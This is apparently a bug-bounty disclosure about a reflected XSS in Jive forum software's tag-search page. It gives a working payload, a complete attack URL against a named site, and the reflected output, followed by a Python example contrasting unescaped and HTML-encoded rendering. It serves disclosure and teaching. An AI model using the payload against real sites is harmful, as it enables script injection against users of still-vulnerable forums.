Reflective XSS on Jive forums

From Hackipedia
OpenBugBounty #146003
Target: Google
Target Module: Jive Forum
Type: XSS
Original Link
Payload: "></option>< /select><body/onpageshow=prompt()>"><svg/onload=prompt('1')>

Spam404's scanner found a reflected XSS in Jive's third-party forum application. The vulnerable area is the page that searches posts by tag.

The impact of this bug was far-reaching, as the forum software can be purchased for use or used as a service via jiveon.com. According to the blog post (Link), some of the sites impacted were McAfee, GoogleEnterprise, Intel, Wells Fargo, and Bank Of America.

There are still instances of this XSS in the wild today.

Attack URL:

https://connect.googleforwork.com/community/applicants/apps/english/credit-check/tags?tags="></option></select><body/onpageshow=prompt()>"><svg/onload=prompt(/XSSPOSED/)>

Result:

<div id="jive-body" class="clearfix">"><svg/onload=prompt(/XSSPOSED/)>"/>
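
The reflection above, reproduced offline next to its output-encoded form. This is an added example, not code from Jive or from the original report. The `TEMPLATE` markup is a constructed stand-in for the tag-search page (an assumption based on the payload closing an option and a select), and the function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Payload exactly as shown in the attack URL on this page.
PAYLOAD = '"></option></select><body/onpageshow=prompt()>"><svg/onload=prompt(/XSSPOSED/)>'

# Constructed stand-in for the tag-search markup (assumption, not Jive's template).
TEMPLATE = '<select name="tags"><option value="{tag}">{tag}</option></select>'


def render_vulnerable(tag):
    """Reflect the tags parameter without encoding, as the report describes."""
    return TEMPLATE.format(tag=tag)


def render_hardened(tag):
    """HTML-encode &, <, > and both quote characters before reflecting."""
    return TEMPLATE.format(tag=html.escape(tag, quote=True))


class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(markup):
    """Return (tag name, attributes) for every element the parser sees."""
    parser = _Collector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def event_handlers(markup):
    """Return (tag, attribute) pairs for inline on* event handlers."""
    return [(tag, name) for tag, attrs in start_tags(markup)
            for name in attrs if name.startswith("on")]


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        page = render(PAYLOAD)
        print(label, [t for t, _ in start_tags(page)], event_handlers(page))
```

In the hardened output the parser sees only the `select` and `option` elements, and the option's `value` decodes back to the submitted string, so the tag search still receives the user's input as data.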